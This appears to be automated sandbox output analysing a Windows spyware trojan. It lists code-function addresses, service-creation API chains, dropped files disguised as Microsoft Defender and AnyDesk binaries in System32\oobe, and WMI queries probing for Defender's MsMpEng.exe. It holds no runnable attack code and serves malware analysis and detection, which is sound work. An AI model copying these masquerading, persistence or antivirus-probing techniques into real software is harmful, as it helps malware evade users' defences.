Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785E3B00_2_00007FF6C785E3B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C786F2F40_2_00007FF6C786F2F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C786FB140_2_00007FF6C786FB14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785D2400_2_00007FF6C785D240
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7870A740_2_00007FF6C7870A74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7875A900_2_00007FF6C7875A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785DA900_2_00007FF6C785DA90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78832B40_2_00007FF6C78832B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78719C80_2_00007FF6C78719C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C785F9F00_2_00007FF6C785F9F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78781D80_2_00007FF6C78781D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78821FC0_2_00007FF6C78821FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78762200_2_00007FF6C7876220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7857A200_2_00007FF6C7857A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78899400_2_00007FF6C7889940
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78869400_2_00007FF6C7886940
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C78601900_2_00007FF6C7860190
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1820905_2_00007FF76E182090
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1831E05_2_00007FF76E1831E0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1997445_2_00007FF76E199744
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18BF505_2_00007FF76E18BF50
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C7305_2_00007FF76E18C730
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A4F8C5_2_00007FF76E1A4F8C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E197FD05_2_00007FF76E197FD0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18B7D05_2_00007FF76E18B7D0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1977B05_2_00007FF76E1977B0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1B0FB45_2_00007FF76E1B0FB4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E19AFA85_2_00007FF76E19AFA8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18B8105_2_00007FF76E18B810
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A5FF05_2_00007FF76E1A5FF0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C8205_2_00007FF76E18C820
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C0705_2_00007FF76E18C070
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A490C5_2_00007FF76E1A490C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A58E85_2_00007FF76E1A58E8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1ABD605_2_00007FF76E1ABD60
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E197DC45_2_00007FF76E197DC4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E189DD05_2_00007FF76E189DD0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E19C5985_2_00007FF76E19C598
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E198D9C5_2_00007FF76E198D9C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1AADF85_2_00007FF76E1AADF8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18B6105_2_00007FF76E18B610
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1B16505_2_00007FF76E1B1650
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E183E205_2_00007FF76E183E20
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E19F6785_2_00007FF76E19F678
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A86B45_2_00007FF76E1A86B4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18B6E05_2_00007FF76E18B6E0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E19CB405_2_00007FF76E19CB40
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E199B7C5_2_00007FF76E199B7C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A9B945_2_00007FF76E1A9B94
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E197BC05_2_00007FF76E197BC0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C3D05_2_00007FF76E18C3D0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C4105_2_00007FF76E18C410
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18B4405_2_00007FF76E18B440
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E19D4205_2_00007FF76E19D420
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A44785_2_00007FF76E1A4478
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18BC705_2_00007FF76E18BC70
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1AEC985_2_00007FF76E1AEC98
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C5005_2_00007FF76E18C500
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A09405_2_00007FF76E1A0940
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1AADF85_2_00007FF76E1AADF8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1A917C5_2_00007FF76E1A917C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1981D45_2_00007FF76E1981D4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1979B45_2_00007FF76E1979B4
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18C2305_2_00007FF76E18C230
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1B02905_2_00007FF76E1B0290
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1AD2905_2_00007FF76E1AD290
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E18BA705_2_00007FF76E18BA70
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA9512907_2_00007FF7AA951290
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA9590E07_2_00007FF7AA9590E0
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA9578947_2_00007FF7AA957894
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA9521307_2_00007FF7AA952130
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeCode function: 7_2_00007FF7AA95F6887_2_00007FF7AA95F688
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDBAD6825_2_00007FF71DDBAD68
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8284025_2_00007FF71DD82840
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD87A2025_2_00007FF71DD87A20
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDAE95C25_2_00007FF71DDAE95C
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA351025_2_00007FF71DDA3510
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9F70425_2_00007FF71DD9F704
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA06DC25_2_00007FF71DDA06DC
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD886D025_2_00007FF71DD886D0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDBA6CC25_2_00007FF71DDBA6CC
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8D60025_2_00007FF71DD8D600
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8CDF025_2_00007FF71DD8CDF0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA1DCC25_2_00007FF71DDA1DCC
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA159025_2_00007FF71DDA1590
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB451825_2_00007FF71DDB4518
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDAD53425_2_00007FF71DDAD534
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA4D2825_2_00007FF71DDA4D28
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9F91025_2_00007FF71DD9F910
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9F0F025_2_00007FF71DD9F0F0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDAD0A025_2_00007FF71DDAD0A0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8D09025_2_00007FF71DD8D090
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9286025_2_00007FF71DD92860
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDAF06425_2_00007FF71DDAF064
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB451825_2_00007FF71DDB4518
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8E01025_2_00007FF71DD8E010
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDAFFBC25_2_00007FF71DDAFFBC
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8CF7025_2_00007FF71DD8CF70
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9FB1425_2_00007FF71DD9FB14
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9F2F425_2_00007FF71DD9F2F4
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB32B425_2_00007FF71DDB32B4
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA5A9025_2_00007FF71DDA5A90
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8DA9025_2_00007FF71DD8DA90
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA0A7425_2_00007FF71DDA0A74
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8D24025_2_00007FF71DD8D240
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA622025_2_00007FF71DDA6220
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB21FC25_2_00007FF71DDB21FC
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA81D825_2_00007FF71DDA81D8
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8F9F025_2_00007FF71DD8F9F0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA19C825_2_00007FF71DDA19C8
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9019025_2_00007FF71DD90190
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB994025_2_00007FF71DDB9940
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB694025_2_00007FF71DDB6940
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8D92025_2_00007FF71DD8D920
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8E13025_2_00007FF71DD8E130
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD9F50025_2_00007FF71DD9F500
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDA94A025_2_00007FF71DDA94A0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB541025_2_00007FF71DDB5410
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8E3B025_2_00007FF71DD8E3B0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDADBB425_2_00007FF71DDADBB4
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD8D35025_2_00007FF71DD8D350
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDB834825_2_00007FF71DDB8348
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000000.2117381795.00007FF6C78AD000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnyDeskUpdateService.exeJ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnyDeskUpdateService.exeJ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoftWindowsDefenderCoreService.exeh$ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeBinary or memory string: OriginalFilenameAnyDeskUpdateService.exeJ vs SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Source: classification engineClassification label: mal76.evad.winEXE@545/20@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: CreateServiceW,0_2_00007FF6C7890008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateEventW,SetServiceStatus,CreateThread,GetLastError,SetServiceStatus,_invalid_parameter_noinfo_noreturn,0_2_00007FF6C7857A20
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateEventW,SetServiceStatus,CreateThread,GetLastError,SetServiceStatus,_invalid_parameter_noinfo_noreturn,SetServiceStatus,SetEvent,SetServiceStatus,5_2_00007FF76E1831E0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetModuleFileNameW,GetLastError,OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateEventW,SetServiceStatus,CreateThread,GetLastError,SetServiceStatus,25_2_00007FF71DD87A20
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: CreateServiceW,25_2_00007FF71DDC0008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7852840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW,0_2_00007FF6C7852840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7852840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW,0_2_00007FF6C7852840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7890030 StartServiceCtrlDispatcherW,RegisterEventSourceW,0_2_00007FF6C7890030
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E182090 GetCurrentProcessId,ShellExecuteExW,lstrcmpiW,StartServiceCtrlDispatcherW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF76E182090
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: 5_2_00007FF76E1B7030 StartServiceCtrlDispatcherW,5_2_00007FF76E1B7030
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DD82840 GetFileAttributesW,GetFileAttributesW,InternetCloseHandle,GetFileAttributesW,MoveFileW,GetFileAttributesW,GetFileAttributesW,ShellExecuteExW,GetLastError,WaitForSingleObject,CloseHandle,lstrcmpiW,GetCurrentProcessId,ShellExecuteExW,GetLastError,StartServiceCtrlDispatcherW,25_2_00007FF71DD82840
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: 25_2_00007FF71DDC0030 StartServiceCtrlDispatcherW,OpenSCManagerW,25_2_00007FF71DDC0030
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1112:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5648:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1952:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MsMpEng.exe")
